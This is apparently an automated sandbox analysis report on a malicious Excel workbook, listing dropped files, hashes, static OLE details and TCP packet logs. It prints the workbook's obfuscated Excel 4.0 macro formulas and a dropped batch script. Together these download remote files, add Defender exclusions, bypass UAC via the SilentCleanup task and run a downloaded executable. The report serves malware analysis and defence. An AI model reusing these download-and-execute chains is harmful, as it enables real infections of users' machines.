                                                        SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                        Malicious:false
                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Fri Jan 8 16:05:56 2021, atime=Fri Jan 8 16:05:56 2021, length=8192, window=hide
                                                        Category:dropped
                                                        Size (bytes):867
                                                        Entropy (8bit):4.489503739489606
                                                        Encrypted:false
                                                        SSDEEP:12:85QMCLgXg/XAlCPCHaX5B8zDXB/h8X+WnicvbUbDtZ3YilMMEpxRljKGwyTdJP9O:85LU/XTp6zLcYe0Dv3qHwqrNru/
                                                        MD5:1AF82EB593899CBB3FE4C0A5963DB3CE
                                                        SHA1:2FD54A6ED91E337FECF797A8AA84C94CB85E5B9E
                                                        SHA-256:6C968B89F756B291AA577E52DA6B094932C5449F652AF331289FC0F866CDCE64
                                                        SHA-512:3348A5E9D0980CD5AC39791B1AACEAE44E6F3C1EB706DD90AEB359EA031048BA8C04A6507E565991E66A9F90A77D73D0D8C59375C84455234B70FDB36E6DA33D
                                                        Malicious:false
                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):83
                                                        Entropy (8bit):4.42866744313446
                                                        Encrypted:false
                                                        SSDEEP:3:oyBVomMUVnRJpSIJdnRJpSmMUVnRJpSv:dj6MnxfdnxEMnxc
                                                        MD5:ABFBBA964FE194830991FC3EDDE3FB4A
                                                        SHA1:7E2AD416D70C53F0E3A6C31035D55C670D70A57E
                                                        SHA-256:D855D7448592A8D2F464D582E53D2346D55F3E09F765D2CC18229B09BF3EBA90
                                                        SHA-512:D647981A3C6787C6F6DBFCED8F20F7B42BB420C6DE38C005A2B22174CD66692254271B669EF79C4691ED3F9AAE796E13D15EC7E145BCE4BC1ABA5B804DA5D409
                                                        Malicious:false
                                                        Preview: Desktop.LNK=0..[xls]..ul9kpUwYel.LNK=0..ul9kpUwYel.LNK=0..[xls]..ul9kpUwYel.LNK=0..
                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ul9kpUwYel.LNK
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:24 2020, mtime=Fri Jan 8 16:05:56 2021, atime=Fri Jan 8 16:05:56 2021, length=289280, window=hide
                                                        Category:dropped
                                                        Size (bytes):2028
                                                        Entropy (8bit):4.521373297611859
                                                        Encrypted:false
                                                        SSDEEP:48:85q/XTgzLZGhZnHTQh25q/XTgzLZGhZnHTQ/:8A/X8zLZaRHTQh2A/X8zLZaRHTQ/
                                                        MD5:4C6C05FC98365660BEFCC68B5251A03A
                                                        SHA1:053431E4A2C81C6AF52E24F3DF897999F033F663
                                                        SHA-256:9100D1D9AD54608B6C427B1610E7CD548F56325AD46DDD05F3DE97E6A031EA2F
                                                        SHA-512:A6DFEE4C7A1A04627EE1718A921754B1AA3088BA25FCD361F41D1D0FFBB7CD6CBAAAB260A7B873A428FA9A57393D6C5D8E0B5E55196DB87BAD3D8485B5E04AF2
                                                        Malicious:false
                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1LYCPT5GDMC5WV088G26.temp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):8016
                                                        Entropy (8bit):3.5899129888051573
                                                        Encrypted:false
                                                        SSDEEP:96:chQCsMqUqvsqvJCwoxTz8hQCsMqUqvsEHyqvJCwornTzjLdYxH2Tf8CLWlUVjTIu:cydolz8yFHnorTzjLLf8CLtIu
                                                        MD5:A74F06C6226FEE2F93B9D38B04E2ADF0
                                                        SHA1:2CED57A3382081C72D47A0A14F503EFF3F1BA4A4
                                                        SHA-256:14131C28D276C034941040BAFB82A770FE83B041B3241F88ABDCD05B43AB8703
                                                        SHA-512:DB04E5B68A92D44F3A08988E7CBEAD80EF57F1748BBD591882466E8907C111C55E2B2A225CDDA1B7BFE4FF81277C94E0B288A006806ED710CE519CD9C1109093
                                                        Malicious:false
                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\20519T597D0EZEFAD1MF.temp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):8016
                                                        Entropy (8bit):3.5899129888051573
                                                        Encrypted:false
                                                        SSDEEP:96:chQCsMqUqvsqvJCwoxTz8hQCsMqUqvsEHyqvJCwornTzjLdYxH2Tf8CLWlUVjTIu:cydolz8yFHnorTzjLLf8CLtIu
                                                        MD5:A74F06C6226FEE2F93B9D38B04E2ADF0
                                                        SHA1:2CED57A3382081C72D47A0A14F503EFF3F1BA4A4
                                                        SHA-256:14131C28D276C034941040BAFB82A770FE83B041B3241F88ABDCD05B43AB8703
                                                        SHA-512:DB04E5B68A92D44F3A08988E7CBEAD80EF57F1748BBD591882466E8907C111C55E2B2A225CDDA1B7BFE4FF81277C94E0B288A006806ED710CE519CD9C1109093
                                                        Malicious:false
                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PNBQABH49BUBWNJMEEIM.temp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):8016
                                                        Entropy (8bit):3.5899129888051573
                                                        Encrypted:false
                                                        SSDEEP:96:chQCsMqUqvsqvJCwoxTz8hQCsMqUqvsEHyqvJCwornTzjLdYxH2Tf8CLWlUVjTIu:cydolz8yFHnorTzjLLf8CLtIu
                                                        MD5:A74F06C6226FEE2F93B9D38B04E2ADF0
                                                        SHA1:2CED57A3382081C72D47A0A14F503EFF3F1BA4A4
                                                        SHA-256:14131C28D276C034941040BAFB82A770FE83B041B3241F88ABDCD05B43AB8703
                                                        SHA-512:DB04E5B68A92D44F3A08988E7CBEAD80EF57F1748BBD591882466E8907C111C55E2B2A225CDDA1B7BFE4FF81277C94E0B288A006806ED710CE519CD9C1109093
                                                        Malicious:false
                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T70ZP6LTUP685KT127GQ.temp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):8016
                                                        Entropy (8bit):3.5899129888051573
                                                        Encrypted:false
                                                        SSDEEP:96:chQCsMqUqvsqvJCwoxTz8hQCsMqUqvsEHyqvJCwornTzjLdYxH2Tf8CLWlUVjTIu:cydolz8yFHnorTzjLLf8CLtIu
                                                        MD5:A74F06C6226FEE2F93B9D38B04E2ADF0
                                                        SHA1:2CED57A3382081C72D47A0A14F503EFF3F1BA4A4
                                                        SHA-256:14131C28D276C034941040BAFB82A770FE83B041B3241F88ABDCD05B43AB8703
                                                        SHA-512:DB04E5B68A92D44F3A08988E7CBEAD80EF57F1748BBD591882466E8907C111C55E2B2A225CDDA1B7BFE4FF81277C94E0B288A006806ED710CE519CD9C1109093
                                                        Malicious:false
                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W2MFNCCZKET1DP3F8CLA.temp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):8016
                                                        Entropy (8bit):3.5899129888051573
                                                        Encrypted:false
                                                        SSDEEP:96:chQCsMqUqvsqvJCwoxTz8hQCsMqUqvsEHyqvJCwornTzjLdYxH2Tf8CLWlUVjTIu:cydolz8yFHnorTzjLLf8CLtIu
                                                        MD5:A74F06C6226FEE2F93B9D38B04E2ADF0
                                                        SHA1:2CED57A3382081C72D47A0A14F503EFF3F1BA4A4
                                                        SHA-256:14131C28D276C034941040BAFB82A770FE83B041B3241F88ABDCD05B43AB8703
                                                        SHA-512:DB04E5B68A92D44F3A08988E7CBEAD80EF57F1748BBD591882466E8907C111C55E2B2A225CDDA1B7BFE4FF81277C94E0B288A006806ED710CE519CD9C1109093
                                                        Malicious:false
                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XLLWWEN87DPEWAHB9XA5.temp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):8016
                                                        Entropy (8bit):3.5899129888051573
                                                        Encrypted:false
                                                        SSDEEP:96:chQCsMqUqvsqvJCwoxTz8hQCsMqUqvsEHyqvJCwornTzjLdYxH2Tf8CLWlUVjTIu:cydolz8yFHnorTzjLLf8CLtIu
                                                        MD5:A74F06C6226FEE2F93B9D38B04E2ADF0
                                                        SHA1:2CED57A3382081C72D47A0A14F503EFF3F1BA4A4
                                                        SHA-256:14131C28D276C034941040BAFB82A770FE83B041B3241F88ABDCD05B43AB8703
                                                        SHA-512:DB04E5B68A92D44F3A08988E7CBEAD80EF57F1748BBD591882466E8907C111C55E2B2A225CDDA1B7BFE4FF81277C94E0B288A006806ED710CE519CD9C1109093
                                                        Malicious:false
                                                        C:\Users\user\AppData\Roaming\cr.exe
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                        Category:dropped
                                                        Size (bytes):565248
                                                        Entropy (8bit):7.234649741813346
                                                        Encrypted:false
                                                        SSDEEP:12288:4olpZq/qtrvH5GxZ8cyGdGYa3JbD/ON/5Eg:4orZq/q9CYG8YAJbDmN
                                                        MD5:740E559929463320CB8E0403FD35A097
                                                        SHA1:CFE5A0BF2D21B6C36930DCC942849086DDEC9134
                                                        SHA-256:BAB37B37285FABDDA77B8C7EEA78B97EE1EF087DF7ECA796E3D49C4205DE6BD1
                                                        SHA-512:D56B448064828AEEC98536CAA9F3264327871FABA16D8B8FAD48D9C2781C994D93C2A85DE1C3EDAEC5EC736671673FFFF24D46C8070B960FED9A5958DD9C6501
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 72%
                                                        C:\Users\user\Desktop\251F0000
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:Applesoft BASIC program data, first line number 16
                                                        Category:dropped
                                                        Size (bytes):297703
                                                        Entropy (8bit):7.748820416386462
                                                        Encrypted:false
                                                        SSDEEP:6144:nk3hbdlylKsgqopeJBWhZFVE+W2Nd00PRkbE4ASEg7R6aNeMs64oYiyJT4JQIMWg:nn9ASKaNeEYLTfIM3
                                                        MD5:62B4022B1E29913ECFA4F5D47807C60E
                                                        SHA1:EAEF7910733990E9D863040550E459D2EEAE7943
                                                        SHA-256:1BF64FCE96A41E7121C1A12698171DDFED3FE227941AA61E69F378C3AF405587
                                                        SHA-512:90C980B3A9FB4045A5951506BF9350D7861FFEF5203EEDFDA1751B840994D5BFE30DE9BC8597B028F07B9C101D2EAA99AFD0008AAC595A37A212712B36AC8974
                                                        Malicious:false
                                                        C:\Users\user\Documents\pd.bat
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):2000
                                                        Entropy (8bit):5.3585901083999214
                                                        Encrypted:false
                                                        SSDEEP:48:dnjA3VfSfC/7vUVfSfC/7vQVfSfC/7vu1AQ:dnM30K/Q0K/k0K/sAQ
                                                        MD5:C771FD125198A4C0339E354183CD48A9
                                                        SHA1:47399A8E8FC4FE8A41703A587EC26C2837C6BA3A
                                                        SHA-256:9B46B9922BE2E0A9CDEE75F02F86C6CA9ECA965A2CA84EAAB8A997A2BC11E768
                                                        SHA-512:5BBA903C99973959CD090AB1483F66AA2B13823F180E26C369892996A6163E6E28BC4623C1CCE095ED6D3A944F384A84058313B2DC847B2EE92B9185C797C2FC
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: C:\Users\user\Documents\pd.bat, Author: Florian Roth
                                                        • Rule: JoeSecurity_ObfuscatedPowershell, Description: Yara detected Obfuscated Powershell, Source: C:\Users\user\Documents\pd.bat, Author: Joe Security
                                                        Preview: mode 18,1..color FE..setlocal..for /f "tokens=4-5 delims=. " %%i in ('ver') do set VERSION=%%i.%%j..if "%version%" == "10.0" ( echo "Windows 10 detected" ..reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 Add-MpPreference -ExclusionPath "$env:temp" ;Add-MpPreference -ExclusionPath "$env:appdata" ;Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;&REM " >nul..timeout /t 2 >nul..schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul..timeout /t 3 >nul..reg delete "HKCU\Environment" /v "windir" /F..)..if "%version%" == "6.3" ( echo "Windows 8.1 detected" ..reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 Add-MpPreference -ExclusionPath "$env:temp" ;Add-MpPreference -ExclusionPath "$env:appdata" ;Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2;

                                                        Static File Info

                                                        General

                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Last Saved By: blobijump, Create Time/Date: Sun Sep 20 22:17:44 2020, Last Saved Time/Date: Sun Jan 3 23:14:32 2021, Security: 1
                                                        Entropy (8bit):7.822763112772762
                                                        TrID:
                                                        • Microsoft Excel sheet (30009/1) 47.99%
                                                        • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                        • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                        File name:ul9kpUwYel.xls
                                                        File size:281600
                                                        MD5:c2ca4d5f2632597023b6cf5b496fb4ed
                                                        SHA1:076f6120eb80059c41e8d731d59471a2e9d81ad8
                                                        SHA256:1ed66ae579df680aae0c4469e916cc97a943e9f600a4d55767755456d6079c75
                                                        SHA512:67c000984f8811626fcebb522b21399a29bc51fbddae108c08af6760cf57720ffc87eb4fdb448cfe4a8d0f355e30a46f804619dfb7cccadcbfae9a3e1339c4ca
                                                        SSDEEP:6144:fnSGiysRchNXHfA1MiWhZFVEld+Dr7EU/RdbM4oSEIbWyaNekMiYg4iyJTQJQgTH:2WloSVaNeM4rT3gTH

                                                        File Icon

                                                        Icon Hash:e4eea286a4b4bcb4

                                                        Static OLE Info

                                                        General

                                                        Document Type:OLE
                                                        Number of OLE Files:1

                                                        OLE File "ul9kpUwYel.xls"

                                                        Indicators

                                                        Has Summary Info:True
                                                        Application Name:unknown
                                                        Encrypted Document:False
                                                        Contains Word Document Stream:False
                                                        Contains Workbook/Book Stream:True
                                                        Contains PowerPoint Document Stream:False
                                                        Contains Visio Document Stream:False
                                                        Contains ObjectPool Stream:
                                                        Flash Objects Count:
                                                        Contains VBA Macros:True

                                                        Summary

                                                        Code Page:1252
                                                        Last Saved By:blobijump
                                                        Create Time:2020-09-20 21:17:44
                                                        Last Saved Time:2021-01-03 23:14:32
                                                        Security:1

                                                        Document Summary

                                                        Document Code Page:1252
                                                        Thumbnail Scaling Desired:False
                                                        Contains Dirty Links:False
                                                        Shared Document:False
                                                        Changed Hyperlinks:False
                                                        Application Version:1048576

                                                        Streams

                                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 276
                                                        General
                                                        Stream Path:\x5DocumentSummaryInformation
                                                        File Type:data
                                                        Stream Size:276
                                                        Entropy:3.16930549839
                                                        Base64 Encoded:False
                                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 156
                                                        General
                                                        Stream Path:\x5SummaryInformation
                                                        File Type:data
                                                        Stream Size:156
                                                        Entropy:3.29938329109
                                                        Base64 Encoded:False
                                                        Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 276911
                                                        General
                                                        Stream Path:Workbook
                                                        File Type:Applesoft BASIC program data, first line number 16
                                                        Stream Size:276911
                                                        Entropy:7.85404453629
                                                        Base64 Encoded:True

                                                        Macro 4.0 Code

                                                        ;;;;;;;112;;;;;;"=GET.CELL(5;L581)";;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item """"pd""&CHAR(46)&""bat"""" -Destination """"$e`nV:T`EMP"""""")";;;;;;;;;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd""&CHAR(46)&""bat -Force"")";;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd""&CHAR(46)&""bat"")";;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 7;cd """"$e`nV:T`EMP; ./pd""&CHAR(46)&""bat"""""")";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 (nEw-oB`jecT Ne""&CHAR(116)&CHAR(46)&CHAR(87)&CHAR(101)&""bcLIENt).('Down'+'loadFile').In""&CHAR(118)&""oke('""&CHAR(104)&""ttps://cutt.ly/ZjsbPXY','pd""&CHAR(46)&""bat')"")";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        Jan 8, 2021 09:06:20.295434952 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295444965 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.295450926 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295466900 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295479059 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.295485973 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295505047 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295509100 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.295521021 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295537949 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295553923 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295556068 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.295571089 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295583963 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295598984 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.295599937 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295620918 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295644999 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.297324896 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.447252035 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447279930 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447293043 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447304964 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447316885 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447328091 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447340012 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447356939 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447369099 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447381020 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447392941 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447398901 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.447412014 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447432995 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447448969 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447665930 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.447757959 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447782040 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447813988 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447829008 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447854996 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.447896004 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447904110 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.447913885 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447971106 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.449131966 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.449156046 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.449234962 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.453002930 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453044891 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453124046 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.453335047 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453355074 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453408957 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453419924 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.453428984 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453448057 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453460932 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453474045 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453490973 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453499079 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.453507900 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453521013 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453531981 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453536987 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.453545094 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453562021 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453578949 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453588963 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.453594923 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453612089 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453622103 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.453624010 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453636885 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453649998 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453665972 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453679085 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.454118967 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.455267906 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.455286026 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.455305099 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.455322981 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.455389977 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.455411911 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.605366945 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605412006 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605474949 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605478048 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.605495930 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605515957 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605531931 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605547905 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605561018 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.605564117 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605581045 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605597973 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605602026 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.605616093 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605635881 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605653048 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605668068 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605675936 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.605684996 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605701923 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605716944 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605734110 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605741978 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.605751991 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605763912 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.605772972 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605818987 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.606971025 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.606991053 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.607057095 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.610965014 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.610996008 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.611073017 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.611397028 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.611427069 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.611452103 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.611474991 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.611485004 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.611500025 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.611525059 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.611550093 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.611552000 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.611572981 CET8049169192.185.194.191192.168.2.22
